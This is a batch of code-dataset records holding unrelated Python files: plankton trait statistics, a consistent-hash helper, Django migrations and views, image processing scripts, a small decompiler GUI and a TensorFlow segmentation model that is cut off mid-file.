[\"size_Z\", \"mu_Z\"]\n\n\n# unit conversions used\n# mum^3 = 1e-18 m^3 =1e-18 (1e3 kg) = 1e-18 (1e3 *1e6 mg) = 1e-9 mg\nuc = {\"ml_L\": 1000,\n \"h_day\": 24, # hours in a day\n \"mum3_mg\": 1e-9 }\n\n# unit conversion (data is reported as per day, but comparison with\n# Kiorboe 2014 shows that this is not the case, but as per hour)\ngrowth.mu_Z *= uc[\"h_day\"]\n\n# log transform data\ngrowth = np.log(growth)\ngrowth = growth[np.isfinite(growth.mu_Z)]\n\nallo_scal[\"mu_Z\"] = 0\n\n########################\n# clearance rate data\nclear = pd.read_csv(\"empirical_data/clearance_rates_brun2017.csv\",\n encoding = 'ISO-8859-1')\nclear = clear[[\"Body mass (mg)\", \"Fmax (15°C)\"]]\nclear.columns = [\"size_Z\", \"c_Z\"]\n#change clearance rate from ml to \\mul\nclear = np.log(clear)\n\nallo_scal[\"c_Z\"] = 1\n\n########################\nmortality = pd.read_csv(\"empirical_data/Hirst_Kiorboe_2002.csv\")\nmortality[\"size_Z\"] /= 1000 # convert \\mug to mg\nmortality[\"size_Z\"] *= 0.1 # convert DV to mg C\nmortality = np.log(mortality)\nallo_scal[\"m_Z\"] = -0.092 # value from Hirst_Kiorboe_2002\n\n########################\n# nutrient contents\nres_cont = pd.read_csv(\"empirical_data/uye_1989.csv\")\nres_cont = res_cont[[\"Length\", \"N\", \"C\", \"DW\"]]\nres_cont[\"N\"] /= 14.01 # convert grams to mol\nres_cont[\"C\"] /= 1000 # convert \\mug to mg\n#relative nutrient content\nres_cont[\"R_conc\"] = res_cont[\"N\"]\n\"\"\"\nif clearance == \"specific_fmax\":\n res_cont[\"R_conc\"] /= res_cont[\"C\"]\"\"\"\nres_cont = np.log(res_cont)\ns_res, i_res, r_res, p_res, std_res = linregress(res_cont[\"C\"],\n 
res_cont[\"R_conc\"])\n# s_res is not distinguishable from 0:\nif s_res -1.96*std_res < np.round(s_res) < s_res + 1.96*std_res:\n s_res = np.round(s_res)\n \n#raw_data[\"k_Z\"] = np.full(2, 0)\nallo_scal[\"k_Z\"] = s_res\n\nraw_data = pd.concat([raw_data, growth, clear, mortality], ignore_index = True)\n\n###############################################################################\n# empirically measured sizes\nallo_scal[\"size_Z\"] = 1\n\ncorr_theory = pd.DataFrame(np.full((len(zoop_traits),len(zoop_traits)), np.nan),\n index = zoop_traits, columns = zoop_traits)\nmean_zoop = pd.DataFrame(columns = zoop_traits, index = [1])\nstd_zoop = pd.DataFrame(columns = zoop_traits, index = [1])\nn_measurments = pd.DataFrame(np.full((len(zoop_traits), len(zoop_traits)), np.nan),\n index = zoop_traits, columns = zoop_traits)\n\nraw_data = raw_data.astype(float)\nfor i,trait in enumerate(zoop_traits):\n if trait == \"k_Z\":\n continue\n # remove outliers\n perc = np.nanpercentile(raw_data[trait], [25,75])\n iqr = perc[1]-perc[0]\n ind = ((raw_data[trait] > perc[0] - 1.5*iqr) &\n (raw_data[trait] < perc[1] + 1.5*iqr))\n raw_data.loc[~ind, trait] = np.nan\n \n \n mean_zoop[trait] = np.nanmean(raw_data[trait])\n std_zoop[trait] = np.nanstd(raw_data[trait])\n\nsize_var = np.nanvar(raw_data[\"size_Z\"])\nsize_std = np.nanstd(raw_data[\"size_Z\"])\n \nfor i,trait in enumerate(zoop_traits):\n corr_theory.loc[trait, trait] = 1\n for j, traitj in enumerate(zoop_traits):\n if i != j: # different traits\n corr_theory.loc[trait, traitj] = (allo_scal[trait]*allo_scal[traitj]\n *size_var\n /(std_zoop[trait]*std_zoop[traitj])).values[0]\n n_measurments.loc[trait, traitj] = np.sum(np.isfinite(\n raw_data[trait]*raw_data[traitj]))\n\ndef nan_linreg(x,y):\n x,y = raw_data[x].values, raw_data[y].values\n ind = np.isfinite(x*y)\n if np.sum(ind) == 0:\n return [0, 0, 0, 0, np.inf]\n return linregress(x[ind], y[ind])\n\nwith warnings.catch_warnings(record = True): \n # compute confidence interval of correlation based on empirical measurments\n corr_empirical = raw_data.corr()\n # convert to fisher z'\n fisher_z = np.arctanh(corr_empirical.values)\n # confidence interval\n alpha = 1.96 # 95% confidence \n alpha = np.array([-alpha, alpha]).reshape(-1,1,1)\n fisher_confidence = fisher_z + alpha/np.sqrt(n_measurments.values - 3)\n corr_confidence = np.tanh(fisher_confidence)\n \n # where not in confidence interval\n corr_zoop = corr_theory.copy()\n ind = (corr_zoopcorr_confidence[1])\n corr_zoop[ind] = corr_empirical\n \n\n\n###############################################################################\n# handle special cases for k_Z = mu_Z*q_min\n# average resource concentration per species\nq_mean = np.nanmean(res_cont[\"R_conc\"])\n\n# q_min = s*size_Z + noise, select variance of nois to have correct r_res\nvar_q_mean = size_var*(1+s_res**2*(1-r_res**2)/r_res**2)\nstd_zoop[\"k_Z\"] = np.sqrt(var_q_mean + std_zoop[\"mu_Z\"])\nq_min_q_mean = np.log(10) # ration between mean and min\nmean_zoop[\"k_Z\"] = q_mean + mean_zoop[\"mu_Z\"] - np.log(q_min_q_mean)\nmean_zoop[\"k_Z\"] = mean_zoop[\"k_Z\"] - np.log(uc[\"h_day\"]) # change units to hours\n\n# corelation between k_z and other parameters\n# k_Z = q_min * mu_Z combined correlation, mu_Z and q_min are uncorrelated\ntraitj = \"k_Z\"\nfor i, trait in enumerate(zoop_traits):\n if trait == \"k_Z\":\n continue\n corr_zoop.loc[trait, traitj] = (allo_scal[trait]*allo_scal[traitj]\n *size_var\n /(std_zoop[trait]*std_zoop[traitj])).values\n corr_zoop.loc[traitj, trait] = 
corr_zoop.loc[trait, traitj]\n\n# correlation between k_Z and maximum growth\ncorr_zoop.loc[\"k_Z\", \"mu_Z\"] = (std_zoop[\"mu_Z\"]/std_zoop[\"k_Z\"]).values\ncorr_zoop.loc[\"mu_Z\", \"k_Z\"] = (std_zoop[\"mu_Z\"]/std_zoop[\"k_Z\"]).values\n\n# increase growth rate of zooplankton, because of couple holling types\nmean_zoop[\"mu_Z\"] += np.log(10)\n# the base covariance matrix of phytoplankton\ncov_base = corr_zoop*std_zoop.values*std_zoop.values[0,:,np.newaxis]\n\n\n# zooplankton prefer phytoplankton that are about 40**-3 times smaller\n# we scale such that mean size zoop prefer mean sized phyto\nzoop_pref = (mean_zoop[\"size_Z\"] - (pt.mean_phyto[\"size_P\"]\n + np.log(uc[\"mum3_mg\"]))).values\n\n# this corresponds to zoop prefering 20**-3 times smaller\nnp.exp(zoop_pref)**(1/3)\n\n# variance of noise term\nsig_size_noise = np.sqrt(size_var - pt.size_var)\n\nif __name__ == \"__main__\":\n # plot distribution of zooplankton traits\n import matplotlib.pyplot as plt\n import generate_plankton as gp\n import plankton_growth as pg\n import warnings\n\n # generate communities\n n_coms = 5000\n r_phyto = 1\n traits = gp.generate_plankton(r_phyto, n_coms, evolved_zoop = False)\n\n env = gp.generate_env(n_coms)\n \n # compute maximum attained growth rate\n traits = gp.phytoplankton_equilibrium(traits, env)\n N = np.array([traits[\"R_star_n_res\"],\n traits[\"R_star_p_res\"], \n traits[\"N_star_P_res\"],\n np.full((n_coms, 1), 1e-5)]).T[0]\n traits[\"mu_Z_effective\"] = np.empty((n_coms,1))\n with warnings.catch_warnings(record = True):\n for i in range(n_coms):\n ti, envi, i= gp.select_i(traits, env, i)\n traits[\"mu_Z_effective\"][i] = pg.per_cap_plankton_growth(N[i],ti, envi)[-1]\n\n traits = np.array([traits[\"size_Z\"], traits[\"mu_Z_effective\"],\n traits[\"c_Z\"], traits[\"m_Z\"], traits[\"k_Z\"]])\n trait_names = [\"Size\", \"Growth\\n$\\mu_Z$\", \"Clearance\\n$c_Z$\", \"Mortality\\n$m_Z$\",\n \"Half\\nsaturation\\n$k_Z$\"]\n with warnings.catch_warnings(record = True):\n traits = np.log(traits.reshape(len(trait_names),-1)).T\n bins = 15\n \n n = len(zoop_traits)\n fig, ax = plt.subplots(n,n,figsize = (9,9), sharex = \"col\", sharey = \"row\")\n \n \n fs = 16\n s = 5\n \n for i in range(n):\n for j in range(n):\n if i>j:\n ax[i,j].scatter(traits[:300,j], traits[:300,i], s = 5,\n alpha = 0.1,\n color = \"blue\")\n ax[i,j].scatter(raw_data[zoop_traits[j]],\n raw_data[zoop_traits[i]],\n s = 3, color = \"orange\")\n else:\n ax[i,j].set_frame_on(False)\n ax[i,j].tick_params(axis = \"y\", colors = \"None\")\n ax[i,j].tick_params(axis = \"x\", colors = \"None\")\n ax_hist = fig.add_subplot(n,n,1 + (n+1)*i)\n\n ax_hist.hist(traits[:,i], bins, density = True, color = \"blue\")\n ax_hist.set_xticklabels([])\n ax_hist.set_yticklabels([])\n ax_hist.set_title(trait_names[i], fontsize = fs)\n if (zoop_traits[i] != \"k_Z\"):\n ax_hist.hist(raw_data[zoop_traits[i]], bins, density = True,\n alpha = 0.5, color = \"orange\")\n ax[i,0].set_ylabel(trait_names[i], fontsize = fs, rotation = 0,\n ha = \"right\", va = \"center\")\n ax[-1,i].set_xlabel(trait_names[i], fontsize = fs)\n \n ax[-1,i].set_xticks(np.round(np.nanpercentile(traits[:,i],[5,95]),1))\n ax[i,0].set_yticks(np.round(np.nanpercentile(traits[:,i],[5,95]),1))\n \n \n \n \n ax[0,0].set_ylim(ax[0,0].get_xlim())\n ax[-1,-1].set_xlim(ax[-1,-1].get_ylim())\n\n 
fig.savefig(\"Figure_zooplankton_traits.pdf\")","sub_path":"zoop_traits.py","file_name":"zoop_traits.py","file_ext":"py","file_size_in_byte":9829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"179503587","text":"import uuid\n\nclass SourceStockBO(object):\n\n def __init__(self):\n self.secu_id = ''\n self.isin = ''\n self.record_update_time = ''\n self.secu_chinese_name = ''\n self.secu_english_name = ''\n self.secu_base_id = ''\n self.exch_type = ''\n self.secu_type = ''\n self.secu_sub_type = ''\n self.currency = ''\n self.bond_par_value = 0.0\n self.not_list_stkqty = ''\n self.last_trade_date = ''\n self.list_date = ''\n self.product_set_id = ''\n self.buy_unit = 0\n self.sell_unit = 0\n self.trade_low_limit = 0\n self.trade_high_limit = 0\n self.pre_close_price = 0.0\n self.tick_price = 0.0\n self.price_limit_type = ''\n self.price_high_limit = 0.0\n self.price_low_limit = 0.0\n self.ex_right_ratio = 0.0\n self.dividend_price = 0.0\n self.financing_flag = ''\n self.margin_flag = ''\n self.secu_status = ''\n self.memo = ''\n self.uuid = str(uuid.uuid1())\n self.boid = 1501\n self.destination = \"fstp.ace.rds.source.stock\"\n","sub_path":"fstp-python/com/purefun/fstp/core/bo/model/SourceStockBO.py","file_name":"SourceStockBO.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"627806016","text":"import hashlib\nimport binascii\nimport bisect\n\n\nclass SimpleConsistentHashTable(object):\n def __init__(self, nodelist):\n \"\"\"Initialize a consistent hash table for the given list of nodes\"\"\"\n baselist = [(hashlib.md5(str(node).encode('utf-8')).digest(), node) for node in nodelist]\n # Build two lists: one of (hashvalue, node) pairs, sorted by\n # hashvalue, one of just the hashvalues, to allow use of bisect.\n self.nodelist = sorted(baselist, key=lambda x: x[0])\n self.hashlist = [hashnode[0] for hashnode in self.nodelist]\n\n def find_nodes(self, key, count=3, avoid=None):\n \"\"\"Return a list of count nodes from the hash table that are\n consecutively after the hash of the given key, together with\n those nodes from the avoid collection that have been avoided.\n\n Returned list size is <= count, and any nodes in the avoid collection\n are not included.\"\"\"\n if avoid is None: # Use an empty set\n avoid = set()\n # Hash the key to find where it belongs on the ring\n hv = hashlib.md5(str(key).encode('UTF-8')).digest()\n # Find the node after this hash value around the ring, as an index\n # into self.hashlist/self.nodelist\n initial_index = bisect.bisect(self.hashlist, hv)\n next_index = initial_index\n results = []\n avoided = []\n while len(results) < count:\n if next_index == len(self.nodelist): # Wrap round to the start\n next_index = 0\n node = self.nodelist[next_index][1]\n if node in avoid:\n if node not in avoided:\n avoided.append(node)\n else:\n results.append(node)\n next_index = next_index + 1\n if next_index == initial_index:\n # Gone all the way around -- terminate loop regardless\n break\n return results\n\n def __str__(self):\n return \",\".join([\"(%s, %s)\" %\n (binascii.hexlify(nodeinfo[0]), nodeinfo[1])\n for nodeinfo in self.nodelist])\ndef preference_list(bucket_name):\n nodeList = ['172.18.16.38', '172.18.16.47', '172.18.16.86', '172.18.16.123']\n sch = SimpleConsistentHashTable(nodeList)\n #data = \"hiiii\"\n #input_key = hashlib.md5(str(data).encode('utf-8')).digest()\n x = sch.find_nodes(bucket_name)\n 
return x,nodeList\n #print(sch.hashlist)","sub_path":"REST_SERVER_SRC/consistentHashing.py","file_name":"consistentHashing.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"465382389","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('threefeatures', '0028_auto_20151010_2140'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Ucretsiz_Hizmet_Talepleri',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),\n ('uye_istek', models.CharField(max_length=50, verbose_name='Talep Eden Üye')),\n ('talep_edilen_hizmet', models.CharField(max_length=20, verbose_name='Talep Edilen Hizmet')),\n ('talep_tarih', models.DateTimeField(verbose_name='Talep Tarihi', auto_now=True)),\n ('talep_sonuc', models.CharField(max_length=25, verbose_name='Talep Durumu', choices=[('0', 'Onaylanmamış'), ('1', 'Talep kabul edildi.'), ('2', 'Talep reddedildi.')])),\n ],\n options={\n 'verbose_name_plural': 'Ücretsiz Hizmet Talepleri',\n 'verbose_name': 'Ücretsiz Hizmet Talebi',\n },\n ),\n migrations.CreateModel(\n name='Ucretsiz_Hizmetler',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),\n ('tur', models.CharField(max_length=20, choices=[('0', 'Afiş'), ('1', 'Animasyon'), ('2', 'Intro')])),\n ('foto_video', models.FileField(upload_to='assets/images/ucretsizler/', verbose_name='Fotoğraf/Video')),\n ('aciklama', models.CharField(max_length=150)),\n ],\n options={\n 'verbose_name_plural': 'Ücretsiz Hizmetler',\n 'verbose_name': 'Ücretsiz Hizmet',\n },\n ),\n ]\n","sub_path":"threefeatures/migrations/0029_ucretsiz_hizmet_talepleri_ucretsiz_hizmetler.py","file_name":"0029_ucretsiz_hizmet_talepleri_ucretsiz_hizmetler.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"250535237","text":"def solution(board):\n return bfs(board)\n\n\n# 건설하려는 도로가 이미 건설된 도로보다 비용이 적을 때 건설할 수 있다.\ndef bfs(board):\n costs = [[[987654321, 987654321] for i in range(len(board))] for i in range(len(board))]\n costs[0][0] = [0, 0]\n q = [[0, 0, 0], [0, 0, 1]] # [row, col, direction] direction - 0: 수평이동, 1: 상하이동\n direction = [[0, -1], [0, 1], [-1, 0], [1, 0]] # 좌우: 0, 상하: 1\n\n while q:\n current = q.pop(0)\n for i, d in enumerate(direction):\n n_row = current[0] + d[0]\n n_col = current[1] + d[1]\n if n_row < 0 or n_col < 0 or n_row >= len(board) or n_col >= len(board) or board[n_row][n_col]: continue\n \n n_cost = costs[current[0]][current[1]][current[2]] + 100\n if current[2]:\n n_cost += 500 if not i // 2 else 0 # 상하, 좌우이동하면 코너\n else: \n n_cost += 500 if i // 2 else 0 # 수평, 상하이동하면 코너\n \n # 다음 구간이 원래 구간보다 비용이 더 크면 건설X\n if n_cost > costs[n_row][n_col][i // 2]: continue\n\n costs[n_row][n_col][i // 2] = n_cost\n q.append([n_row, n_col, i // 2])\n \n for c in costs:\n print(c)\n print('-------------------------------')\n return min(costs[-1][-1])\n\n\nprint(solution([[0,0,0,0,0,0],[0,1,1,1,1,0],[0,0,1,0,0,0],[1,0,0,1,0,1],[0,1,0,0,0,1],[0,0,0,0,0,0]]))","sub_path":"prev/2020_kakao_intership/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"501931937","text":"import os\nimport 
cv2\n\nAnnotation_path = ('../Annotations_val')\nImage_path = ('../Images_val')\n\n\nf = [os.path.join(root, name) for root, dirs, files in os.walk('.') \\\n for name in files]\n\nclass_with_picname = [(_f.split('/')[1], _f.split('/')[-1][:-4]) for _f in f]\n\nf_with_class_with_picname = zip(f, class_with_picname)\n\nfor p, t in f_with_class_with_picname:\n print(p)\n clsf, pic_name = t\n cvimg = cv2.imread(p)\n cv2.imwrite(os.path.join(Image_path, pic_name + '.jpg'), cvimg)\n with open(os.path.join(Annotation_path, pic_name + '.txt'), 'w') as f:\n f.write(str(clsf).replace('_', '\\n') + '\\n') # File name just like 'gun_person', if one pic own many category.\n\nif __name__ == \"__main__\":\n for a in f_with_class_with_picname:\n print(a)\n","sub_path":"ValueImages/foreground_to_label.py","file_name":"foreground_to_label.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"24934946","text":"\nfrom django.shortcuts import redirect, render\nfrom blog.forms import ContactForm\nfrom blog.models import ContactModel\n\n\ndef contact(request):\n form = ContactForm(initial={\n 'fullname': 'Elmar'\n })\n if request.method == 'POST':\n form = ContactForm(request.POST)\n if form.is_valid():\n contact.save()\n return redirect('homepage')\n context = {\n 'form': form,\n }\n return render(request, 'pages/contact.html', context=context)\n","sub_path":"blog/views/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"432684004","text":"from os import path\nimport os\nfrom tkinter import *\nfrom tkinter.filedialog import askopenfilename\n\npwd = os.getcwd()\n\ndef selectPath():\n path_ = askopenfilename()\n path.set(path_)\n\n\n\n# def savepath():\n# path_ = askopenfilename()\n# save = path.set(path_)\n\n\n\ndef fanbianyi():\n os.system(\"node\"+\" \"+pwd+\"\\wxappUnpacker-master\\wuWxapkg.js\"+\" \"+ path.get())\n # print(path.get()[:-7])\n\n\nroot = Tk()\npath = StringVar()\n\n\nLabel(root, text=\"目标路径\").grid(row=0, column=0)\nEntry(root, textvariable=path).grid(row=0, column=1)\nButton(root, text=\"文件路径\", command=selectPath).grid(row=0, column=2)\n# Label(root, text=\"保存\").grid(row=1, column=0)\n# Entry(root, textvariable=save).grid(row=1, column=1)\n# Button(root, text=\"保存路径\", command=selectPath).grid(row=1, column=2)\nButton(root, text=\"确定\", command=fanbianyi).grid(row=2, column=1)\n\n\nroot.mainloop()\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"170105837","text":"import cv2 as cv\nfrom PIL import Image\nimport numpy as np\nfrom sklearn.cluster import MiniBatchKMeans\nfrom matplotlib.pyplot import imsave\nimport matplotlib.pyplot as plt\nimport os\nimport glob\n\n\n\"\"\"\nTakes in a single file from the InputImages folder and creates a single file output in the Outputs folder.\n\nProcessing takes any almost black pixels from the original and draws the coordinates on top of this canvas.\nI do this as some input images already have a black outline around some parts of the image. The result is then that CED creates a cavity edge\naround this black outline and it looks unpleasant.\n\nThis file uses:\ncluster size 7 which is chosen arbitrarily.\nkernel_size which is calculated from the number of unique colours. 
The logic being that an image with lots of unique colours\nwill require more blurring, and hence a bigger kernel size is preferred.\n\n\"\"\"\n\n\nclass Canny:\n def __init__(self, name, clusters, scalar):\n self.file_name = name\n self.imag = Image.open(f'InputImages/{self.file_name}')\n self.gray = cv.cvtColor(np.array(self.imag), cv.COLOR_BGR2GRAY)\n thresh, self.bw = cv.threshold(self.gray, 20, 255, cv.THRESH_BINARY)\n self.clusters = clusters\n self.height, self.width = self.imag.size\n self.scalar = scalar\n\n def calculate_filter_size(self):\n # We calculate the number of unique colours to determine the kernel_size. An image with a lot of unique\n # colours requires more blurring, which is achieved with a bigger kernel_size.\n unique_colors = set()\n for i in range(self.imag.size[0]):\n for j in range(self.imag.size[1]):\n pixel = self.imag.getpixel((i, j))\n unique_colors.add(pixel)\n\n filter_size = int(str(round(len(unique_colors), -3))[0])\n\n # Filter size needs to be odd. Sometimes I forget and put an even filter size. This will catch this error and\n # reduce it by one to make it odd again.\n if filter_size % 2 == 0:\n filter_size = max(5, filter_size + 1)\n\n else:\n filter_size = max(5, filter_size)\n\n return filter_size\n\n def k_means(self):\n # Resize the image in the hopes that kmeans and contours can find the edges easier.\n # This also reduces computational load.\n w, h = self.imag.size\n if w > 1000:\n h = int(h * 1000. / w)\n w = 1000\n imag = self.imag.resize((w, h), Image.NEAREST)\n\n # Dimension of the original image\n cols, rows = imag.size\n\n # Flatten the image with the new dimensions.\n imag = np.array(imag).reshape(rows * cols, 3)\n\n # Implement k-means clustering to form k clusters\n kmeans = MiniBatchKMeans(n_clusters=self.clusters)\n kmeans.fit(imag)\n\n # Replace each pixel value with its nearby centroid\n compressed_image = kmeans.cluster_centers_[kmeans.labels_]\n compressed_image = np.clip(compressed_image.astype('uint8'), 0, 255)\n\n # Reshape the image to original dimension\n self.compressed_image = compressed_image.reshape(rows, cols, 3)\n print(type(self.compressed_image))\n\n\n def median(self):\n\n self.compressed_image = cv.resize(self.compressed_image,\n dsize=(self.height * self.scalar, self.width * self.scalar),\n interpolation=cv.INTER_NEAREST)\n\n filter_size = self.calculate_filter_size()\n self.median = cv.medianBlur(self.compressed_image, filter_size)\n\n def auto_canny(self, sigma=0.33):\n self.canny = cv.cvtColor(self.median, cv.COLOR_RGB2GRAY)\n\n # compute the median of the single channel pixel intensities\n v = np.median(self.canny)\n # apply automatic Canny edge detection using the computed median\n lower = int(max(0, (0.3 - sigma) * v))\n upper = int(min(255, (0.8 - sigma) * v))\n\n self.edged = cv.Canny(self.canny, lower, upper, L2gradient=True)\n\n\n def draw_contours(self):\n contours, hierarchy = cv.findContours(self.edged, cv.RETR_CCOMP, cv.CHAIN_APPROX_TC89_L1)\n\n\n with open(f'{self.file_name.split(\".\")[0]}.svg', \"w+\") as f:\n f.write(f'')\n\n for c in contours:\n f.write('')\n f.write(f'')\n\n\nfile_name = \"gohan2\"\n\npic = Canny(name=f'{file_name}.jpg', clusters=7, scalar=1)\npic.k_means()\npic.median()\npic.auto_canny()\npic.draw_contours()\n","sub_path":"PythonScripts/SingleFileLocalPython.py","file_name":"SingleFileLocalPython.py","file_ext":"py","file_size_in_byte":4846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"467891135","text":"\"\"\"A test 
python binary which reads a data file and runs a data binary.\"\"\"\nimport os\nimport subprocess\nimport sys\n\nfrom absl import app\nfrom absl import flags\n\nfrom phd.lib.labm8 import bazelutil\n\n\nFLAGS = flags.FLAGS\n\nDATA_FILE = bazelutil.DataPath('phd/learn/bazel/data_file.txt')\nDATA_BINARY = bazelutil.DataPath('phd/learn/bazel/data_binary')\n\n\ndef main(argv):\n \"\"\"Main entry point.\"\"\"\n if len(argv) > 1:\n raise app.UsageError('Unrecognized command line flags.')\n print('Hello from python', sys.executable)\n print('Sanboxed?', bazelutil.IsBazelSandbox())\n print('File location:', __file__)\n print('Current working directory:', os.getcwd())\n with open(DATA_FILE) as f:\n print('Data file:', f.read().rstrip())\n p = subprocess.Popen([DATA_BINARY], stdout=subprocess.PIPE,\n universal_newlines=True)\n stdout, _ = p.communicate()\n print('Data binary:', stdout.rstrip())\n\n\nif __name__ == '__main__':\n app.run(main)\n","sub_path":"learn/bazel/python_binary.py","file_name":"python_binary.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"566759825","text":"import cslab_environ\n\nfrom utils import logger\nfrom utils.grad_clip_optim import GradientClipOptimizer\nimport h5py\nimport image_ops as img\nimport nnlib as nn\nimport numpy as np\nimport tensorflow as tf\n\nimport ris_model_base as base\n\nlog = logger.get()\n\n\ndef _get_idx_mask(idx, timespan):\n \"\"\"Computes the binary mask given an index.\n\n Args:\n idx: [B]\n\n Returns:\n mask: [B, T]\n \"\"\"\n eye = tf.constant(np.eye(timespan, dtype='float32'))\n return tf.gather(eye, idx)\n\n\ndef get_model(opt, device='/cpu:0'):\n \"\"\"The attention model\"\"\"\n model = {}\n\n timespan = opt['timespan']\n inp_height = opt['inp_height']\n inp_width = opt['inp_width']\n inp_depth = opt['inp_depth']\n padding = opt['padding']\n\n cnn_filter_size = opt['cnn_filter_size']\n cnn_depth = opt['cnn_depth']\n cnn_pool = opt['cnn_pool']\n dcnn_filter_size = opt['dcnn_filter_size']\n dcnn_depth = opt['dcnn_depth']\n dcnn_pool = opt['dcnn_pool']\n\n wd = opt['weight_decay']\n use_bn = opt['use_bn']\n segm_loss_fn = opt['segm_loss_fn']\n base_learn_rate = opt['base_learn_rate']\n learn_rate_decay = opt['learn_rate_decay']\n steps_per_learn_rate_decay = opt['steps_per_learn_rate_decay']\n gt_segm_noise = opt['gt_segm_noise']\n clip_gradient = opt['clip_gradient']\n fixed_order = opt['fixed_order']\n if 'add_skip_conn' in opt:\n add_skip_conn = opt['add_skip_conn']\n else:\n add_skip_conn = False\n\n rnd_hflip = opt['rnd_hflip']\n rnd_vflip = opt['rnd_vflip']\n rnd_transpose = opt['rnd_transpose']\n rnd_colour = opt['rnd_colour']\n\n############################\n# Input definition\n############################\n with tf.device(base.get_device_fn(device)):\n # Input image, [B, H, W, D]\n x = tf.placeholder('float', [None, inp_height, inp_width, inp_depth],\n name='x')\n x_shape = tf.shape(x)\n num_ex = x_shape[0]\n\n # Groundtruth segmentation, [B, T, H, W]\n y_gt = tf.placeholder('float', [None, timespan, inp_height, inp_width],\n name='y_gt')\n\n # Groundtruth confidence score, [B, T]\n s_gt = tf.placeholder('float', [None, timespan], name='s_gt')\n\n # Order in which we feed in the samples\n order = tf.placeholder('int32', [None, timespan], name='order')\n\n # Whether in training stage.\n phase_train = tf.placeholder('bool', name='phase_train')\n phase_train_f = tf.to_float(phase_train)\n\n model['x'] = x\n model['y_gt'] = y_gt\n 
model['s_gt'] = s_gt\n model['phase_train'] = phase_train\n model['order'] = order\n\n # Global step\n global_step = tf.Variable(0.0, name='global_step')\n\n###############################\n# Random input transformation\n###############################\n x, y_gt = img.random_transformation(\n x, y_gt, padding, phase_train,\n rnd_hflip=rnd_hflip, rnd_vflip=rnd_vflip,\n rnd_transpose=rnd_transpose, rnd_colour=rnd_colour)\n model['x_trans'] = x\n model['y_gt_trans'] = y_gt\n\n############################\n# Canvas: external memory\n############################\n canvas = tf.zeros(tf.pack([num_ex, inp_height, inp_width, 1]))\n cnn_inp_depth = inp_depth + 1\n\n###########################\n# CNN definition\n###########################\n cnn_filters = cnn_filter_size\n cnn_nlayers = len(cnn_filters)\n cnn_channels = [cnn_inp_depth] + cnn_depth\n cnn_act = [tf.nn.relu] * cnn_nlayers\n cnn_use_bn = [use_bn] * cnn_nlayers\n cnn = nn.cnn(cnn_filters, cnn_channels, cnn_pool, cnn_act,\n cnn_use_bn, phase_train=phase_train, wd=wd,\n scope='cnn', model=model)\n h_cnn = [None] * timespan\n h_cnn_last = [None] * timespan\n\n#############################\n# DCNN definition\n#############################\n dcnn_filters = dcnn_filter_size\n dcnn_nlayers = len(dcnn_filters)\n dcnn_unpool = dcnn_pool\n dcnn_act = [tf.nn.relu] * (dcnn_nlayers - 1) + [tf.sigmoid]\n dcnn_channels = [cnn_channels[-1]] + dcnn_depth\n dcnn_use_bn = [use_bn] * dcnn_nlayers\n if add_skip_conn:\n dcnn_skip_ch = [0] + cnn_channels[::-1][1:]\n else:\n dcnn_skip_ch = None\n dcnn = nn.dcnn(dcnn_filters, dcnn_channels, dcnn_unpool,\n dcnn_act, use_bn=dcnn_use_bn, skip_ch=dcnn_skip_ch,\n phase_train=phase_train, wd=wd, model=model,\n scope='dcnn')\n h_dcnn = [None] * timespan\n h_dcnn_last = [None] * timespan\n\n##########################\n# Segmentation output\n##########################\n y_out = [None] * timespan\n segm_gt = [None] * timespan\n segm_gt[0] = tf.reduce_sum(y_gt, [1])\n\n##########################\n# Computation graph\n##########################\n for tt in xrange(timespan):\n # Attended patch [B, A, A, D]\n cnn_inp = tf.concat(3, [x, canvas])\n\n # CNN [B, A, A, D] => [B, RH2, RW2, RD2]\n h_cnn[tt] = cnn(cnn_inp)\n h_cnn_last[tt] = h_cnn[tt][-1]\n\n # DCNN\n if add_skip_conn:\n skip = [None] + h_acnn[tt][::-1][1:] + [x_patch[tt]]\n else:\n skip = None\n h_dcnn[tt] = dcnn(h_cnn_last[tt], skip=skip)\n h_dcnn_last[tt] = h_dcnn[tt][-1]\n\n # Output\n y_out[tt] = tf.reshape(\n h_dcnn_last[tt], [-1, 1, inp_height, inp_width])\n\n # Canvas\n if fixed_order:\n _y_out = y_gt[:, tt, :, :]\n else:\n mask = _get_idx_mask(order[:, tt], timespan)\n mask = tf.expand_dims(tf.expand_dims(mask, 2), 3)\n _y_out = tf.reduce_sum(mask * y_gt, 1)\n\n _y_out_exp = tf.expand_dims(_y_out, 3)\n # Add independent uniform noise to groundtruth.\n _noise = tf.random_uniform(\n tf.pack([num_ex, inp_height, inp_width, 1]),\n 0, gt_segm_noise)\n _y_out_noise = _y_out_exp - _y_out_exp * _noise\n canvas += _y_out_noise\n if tt < timespan - 1:\n segm_gt[tt + 1] = segm_gt[tt] - _y_out\n\n#########################\n# Model 